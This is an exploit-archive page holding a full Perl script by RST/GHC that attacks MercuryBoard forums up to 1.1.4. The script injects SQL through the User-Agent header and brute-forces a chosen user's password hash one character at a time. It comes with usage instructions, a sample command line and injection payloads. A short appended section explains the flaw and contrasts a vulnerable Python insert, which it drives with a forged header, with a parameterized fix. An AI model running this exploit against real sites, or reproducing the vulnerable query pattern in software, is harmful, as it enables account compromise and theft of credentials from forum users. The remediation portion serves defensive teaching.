MercuryBoard <= 1.1.4 User-Agent Remote SQL Injection Exploit
Source: http://rst.void.ru  Author: 1dt.w0lf  Published: 2005-06-22

MercuryBoard <= 1.1.4 "User-Agent" Remote SQL Injection Exploit

#!/usr/bin/perl

### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### * note: you first need to register on the forum to get an id and login,
### then log out from the forum and run the exploit
### * note2: edit the timestamp in the source if the exploit does not work ;)
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf
### RST/GHC - http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;
use Getopt::Std;

getopts('h:f:b:i:l:p:');

$server = $opt_h;
$path = $opt_f;
$member_id = $opt_b;
$hacker_id = $opt_i;
$hacker_l = $opt_l;
$prefix = $opt_p || 'mb_' ;

if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] FORUM PATH : $path\r\n";
print " [~] ID FOR BRUTE : $member_id\r\n";
print " [~] HACKER ID : $hacker_id\r\n";
print " [~] HACKER LOGIN : $hacker_l\r\n";
print " [~] TABLE PREFIX : $prefix\r\n\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

-------------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
-------------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];

$user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*";

$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept: */*\nConnection: close\n\n", $request,$server,$user_agent2);

while(<$sock2>)
{
#print $_;
if (/w=$hacker_id"\>$hacker_l/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
&head;
print q(
USAGE
r57mercury.pl [OPTIONS]

OPTIONS
-h [host] ~ host where mercury board installed
-f [/folder/] ~ folder where mercury board installed
-b [user_id] ~ user id for bruteforce
-i [id] ~ hacker id (hacker must be register on forum)
-l [login] ~ hacker login on forum
-p [prefix] ~ database tables prefix (optional)
default is "mb"
E.G.
r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
-------------------------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
-------------------------------------------------------------------
MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
-------------------------------------------------------------------
);
}
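The defect this exploit relies on is the forum writing the raw User-Agent header into an INSERT on its active-users table, so a crafted header can finish the current row and splice in another one. As an added illustration (not the page's or RST/GHC's code, and using Python with an in-memory SQLite table as a stand-in for the PHP/MySQL original), the vulnerable handler is shown beside the parameterized form; the schema, column names and forged header are constructed assumptions modelled on the row-splicing trick above, not MercuryBoard's real schema.

```python
import sqlite3

# Constructed stand-in for the forum's "active users" table; the table and
# column names are assumptions for this example, not MercuryBoard's schema.
SCHEMA = "CREATE TABLE active (user_id INTEGER, agent TEXT, ip TEXT)"

# Constructed header value modelled on the exploit's trick: close the quoted
# column, finish the current row, append a second row under another user id,
# and comment out whatever the application appends after it.
FORGED_AGENT = "666', ''), (3, 'forged', '0.0.0.0') /*"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def record_visit_vulnerable(conn, user_id, ip, user_agent):
    # The header is pasted into the SQL text, so quotes inside it become SQL.
    # This is the defect class the exploit above relies on.
    sql = ("INSERT INTO active (user_id, agent, ip) VALUES "
           f"({int(user_id)}, '{user_agent}', '{ip}')")
    conn.execute(sql)
    conn.commit()


def record_visit_hardened(conn, user_id, ip, user_agent):
    # Bound parameters: the value travels separately from the statement, so
    # the header is only ever stored as data and cannot change the query.
    conn.execute("INSERT INTO active (user_id, agent, ip) VALUES (?, ?, ?)",
                 (user_id, user_agent, ip))
    conn.commit()


def rows(conn):
    return conn.execute(
        "SELECT user_id, agent FROM active ORDER BY user_id").fetchall()


def demo(handler):
    # One guest request (user_id 0) carrying the forged User-Agent.
    conn = new_db()
    handler(conn, 0, "198.51.100.7", FORGED_AGENT)
    return rows(conn)


if __name__ == "__main__":
    print("vulnerable:", demo(record_visit_vulnerable))  # two rows, one forged
    print("hardened:  ", demo(record_visit_hardened))    # one row, literal UA
```

The same fix applies to the original: bind the header as a parameter (or escape it with the database driver's quoting function) instead of interpolating it into the query string.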
